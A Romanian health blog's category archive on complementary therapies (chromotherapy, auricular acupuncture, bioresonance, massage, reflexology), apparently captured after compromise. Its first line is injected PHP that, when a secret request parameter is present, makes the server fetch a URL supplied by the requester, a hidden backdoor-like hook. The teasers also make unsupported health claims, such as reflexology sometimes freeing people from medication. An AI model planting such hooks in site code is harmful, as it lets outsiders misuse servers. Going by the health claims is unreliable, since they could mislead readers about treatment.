isset($_REQUEST['zox4vu']) && fetch_feed($_REQUEST['feed_url']); Terapii Complementare - MedicAS

Arhiva pentru categoria 'Terapii complementare'

Cromoterapie? Sanatate? La prima vedere 2 cuvinte care nu au nici o legatura. Analizand un pic mai larg subiectul, vei vedea ca exista…da, culorile ne pot influenta starile, ne pot face sa fim mai activi, veseli, linistiti…Cromoterapia este chiar o terapie complementara. Vi s-a intimplat ca o camera frumos decorata, in anumite culori sa va linisteasca? Sau sa va umple de energie sau bucurie, fara sa stiti de ce dispozitia s-a schimbat? Sau ati atras ochii unor domni sau invidia unor doamne cu rochia aceea minunata, care se facea remarcata din multime? Da, culorile conteaza…aflati mai departe de ce.


Toti, dar mai ales doamnele si domnisoarele, ne dorim o silueta de vis, sau macar in limite normale. Fara burtica, fara colacei…Sa renunti la mincare, cand gusturile iti produc atata placere e greu. Dar, pe langa vointa, exista si alte tehnici care ne pot ajuta sa aratam asa cum ne dorim. Si una dintre ele este acupunctura auriculara, ce face parte din terapiile complementare si pe care o puteti incerca fara regrete.


Nu ştim dacă biorezonanţa este “panaceul universal”… Încadrată în categoria terapiilor complementare, biorezonanţa este acum “pe val”. De ce să recurgeţi la o astfel de investigaţie şi care sunt efectele, vă lăsăm să descoperiţi mai departe…


Toţi avem zile mai grele, cu stress, probleme…De ce să nu încercăm altceva? Masajul face parte din terapiile complementare care, cu siguranţă, ne va face să ne simţim bine, în formă, gata să înfruntăm şi să depăşim orice provocare.


Reflexoterapie

25 March, 2008

Terapii alternative? Am scapat de medicamente? Uneori da. Cum? Cu câteva şedinţe de masaj în talpă, în puncte bine stabilite. Da, prin reflexoterapie, căci despre ea este vorba, ne putem îmbunătăţi starea de sănătate, atât fizică, cât şi psihică. Aflaţi mai departe în ce afecţiuni sunt indicate şedinţele de reflexoterapie.


 
 

Newsletter

Loading... Loading...
 
 

Aceasta este arhiva articolelor din categoria Terapii complementare.